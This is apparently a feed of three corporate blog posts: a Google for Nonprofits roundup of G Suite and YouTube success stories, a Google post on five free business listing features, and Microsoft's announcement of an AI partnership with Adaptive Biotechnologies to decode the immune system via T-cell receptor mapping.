G Suite allows teams to access data anywhere, update files in real time, and collaborate efficiently. Mercy Beyond Borders, a U.S.-based nonprofit with employees deployed in various countries, uses these tools to stay in sync with each other no matter where they are—from tracking finances on Google Sheets to sharing information with board members through Google Sites. And nonprofit MyFace takes advantage of Google’s security and privacy settings to store personal medical data for their patients. Read more about how these nonprofits used G Suite, and find out how to get started with G Suite, in this post.


Learn from “G4NP in Three,” a new YouTube Series

This year we launched our first-ever G4NP YouTube series, “G4NP in Three,” aiming to help nonprofits learn the basics about the Google for Nonprofits program and the process to get enrolled for each product. The videos also cover tips and tricks on how to make the most of the tools available, all in three minutes! Check out the videos and subscribe to stay updated on our latest content.

Introduction to G4NP tools: Tune into our G4NP in Three Series

Get inspired

By using tech in new ways, Action Against Hunger, Girl Scouts of Japan and Fundación Todo Mejora are able to focus their efforts on the work they do and care about most. Through our series “G4NP Around the Globe,” we highlighted how each of these nonprofits benefited with the help of Google tools. Action Against Hunger fundraised more than $20,000 from YouTube donations and used Google Ad Grants to increase site traffic—resulting in $66,000 worth of donations, which equates to feeding 1,466 children in need. Fundación Todo Mejora uses G Suite to easily share and store files, spreads its message on its YouTube channel, and with the help of Ad Grants reaches suicidal teens who are searching for help. And Girl Scouts of Japan created a virtual tour using Google’s mapping tools, and used Google Forms to create quizzes that help scouts earn badges.

Thanks to all nonprofits around the world for the work you do. We look forward to another year of working together to improve the lives of everyone around us!

5 new ways to connect with your customers on Google

Last year, we introduced five new ways to build an eye-catching online presence that shows customers what your business is all about. And the best part? They’re all free.

1. Create a free website in minutes

According to internal Google research, business listings with a website get 25-35% more clicks. And building your site doesn’t have to be complicated or time consuming. You can create a simple mobile-ready site for your business in less than 10 minutes with our automated website builder. Check out how Vince from Village Tailor in New York used his new website to bring in more customers.

2. Post about events, promotions, and more right on Google

It’s now easy to share Posts that show up when people find your business on Search and Maps. According to Ipsos research, 50 percent of people look for promotions or discounts online, so it’s important to share offers, upcoming events, your latest news and more with potential customers right when they find your business.

3. Connect with your customers by answering their questions directly

As a business owner, you have the most reliable answers to your customers’ questions. With Questions and Answers, it’s easy to add frequently asked questions to your listing, answer questions from potential customers, and highlight top responses, so that people can get the most important info about your business right away.

4. Update your business listing without leaving Search

People trust businesses with current and relevant info online, and according to internal Google research, complete Google listings get seven times more clicks. Keep your listing updated with our easy-to-access business dashboard. Simply type your business name on Google Search, and you can complete your listing, share photos and posts related to your business, respond to reviews, and see how many views you’re getting.

5. Start messaging with your customers from Google

Customers don’t always have time to call when they want to reach out to your business. With messaging, people can text your business directly through your listing on Search. Your phone number remains private, so you and your customers can communicate safely, quickly, and easily. (Available in the US, Brazil, Canada and India).

You can use these simple features with your Google listing to stand out and attract new customers online. Get started today.

Microsoft and Adaptive Biotechnologies announce partnership using AI to decode immune system; diagnose, treat disease

The human immune system is an astonishing diagnostic system, continuously adapting itself to detect any signal of disease in the body. Essentially, the state of the immune system tells a story about virtually everything affecting a person’s health. It may sound like science fiction, but what if we could “read” this story? Our scientific understanding of human health would be fundamentally advanced. And more importantly, this would provide a foundation for a new generation of precise medical diagnostic and treatment options.

Photo of Peter Lee standing in front of a whiteboard covered in writing
Peter Lee, Corporate Vice President of AI + Research (Photo by Scott Eklund/Red Box Pictures)

Amazingly, this isn’t just science fiction, but can be science fact. And so we’re excited to announce a new partnership with Seattle-based Adaptive Biotechnologies, coupling the latest advances in AI and machine learning with recent breakthroughs in biotechnology to build a practical technology for mapping and decoding the human immune system. Together, we have a goal that is simple to state but also incredibly ambitious: create a universal blood test that reads a person’s immune system to detect a wide variety of diseases including infections, cancers and autoimmune disorders in their earliest stage, when they can be most effectively diagnosed and treated.

We believe deeply in the potential for this partnership with Adaptive and have made a substantial financial investment in the company. We have also begun a major research and development collaboration that involves Adaptive’s scientists working closely with our top researchers to use Adaptive’s innovative sequencing technology and Microsoft’s large-scale machine learning and cloud computing capabilities to make deep reading of the immune system a reality.

Adaptive CEO and co-founder Chad Robins said in a press release today this announcement comes at a time of inflection in healthcare and biotechnology, as we now have the technology to be able to map the immune system. The potential to help clinicians and researchers connect the dots and understand the relationship between disease states could eventually lead to a better understanding of overall human health.

Imagine a world with an “X-ray of the immune system.” This would open new doors to predictive medicine, as a person’s immunological history is believed to shape their response to new pathogens and treatments in ways that are currently impossible to explore. The impact on human health of such a universal blood test that reads a person’s exposure and response to disease would be, in a word, transformational.

Photo of lab worker's gloved hands working with immunosequencing kit

The immune system’s response to the presence of disease is expressed in the genetics of special cells, called T-cells and B-cells, which form the distributed command and control for the adaptive immune system. Each T-cell has a corresponding surface protein called a T-cell receptor (TCR), which has a genetic code that targets a specific signal of disease, or an antigen.

Mapping TCRs to antigens is a massive challenge, requiring very deep AI technology and machine learning capabilities coupled with emerging research and techniques in computational biology applied to genomics and immunosequencing. A challenge of this nature hasn’t been solved before, but with the collective team we’ve formed with Adaptive, we believe we have the experience, technical capability and tenacity to deliver.

The result would provide a true breakthrough – a detailed insight into what the immune system is doing. Put simply, sequencing the immune system can reveal what diseases the body currently is fighting or has ever fought. A blood sample, therefore, contains the key information needed to read what the immune system is currently detecting.

The basis of this approach is to develop a universal T-cell receptor/antigen map – a model of T-cell receptor sequences and the codes of the antigens they have fought. This universal map of the immune system will enable earlier and more accurate diagnosis of disease and eventually lead to a better understanding of overall human health. Microsoft and Adaptive expect this universal map to be the key for the research and development of simple blood-based diagnostics that are broadly accessible to people around the world.

We’re incredibly excited to collaborate on this project with our partners at Adaptive, who have developed unique immunosequencing capabilities and immune system knowledge, along with very large data sets of TCR sequences. Classifying and mapping this data represents a large-scale machine learning project for which we’ll lean heavily on Microsoft’s cloud computing capabilities and our elite research teams.

We know this partnership and the resulting work represent a big challenge. But we believe in the impact technology can have in healthcare, specifically how AI, the cloud and collaboration with our partners can come together and transform what is possible.

This project is a cornerstone of our Healthcare NExT initiative, with a goal to empower innovators and pair leading capabilities in life and computer sciences to dramatically accelerate the diagnosis and treatment of autoimmune disorders, cancer and infectious disease. At Microsoft, we believe that AI and the cloud have the power to transform healthcare – improving outcomes, providing better access and lowering costs. The Microsoft Healthcare NExT initiative was launched last year to maximize the ability of artificial intelligence and cloud computing to accelerate innovation in the healthcare industry, advance science through technology and turn the lifesaving potential of new discoveries into reality.

We’ll share more details at the upcoming JP Morgan Healthcare Conference in San Francisco, including a fireside chat at 5 p.m. PT on Wednesday, Jan. 10 with Chad Robins and myself called “Decoding the Human Immune System: A Closer Look at a Landmark Partnership.”

The post Microsoft and Adaptive Biotechnologies announce partnership using AI to decode immune system; diagnose, treat disease appeared first on The Official Microsoft Blog.
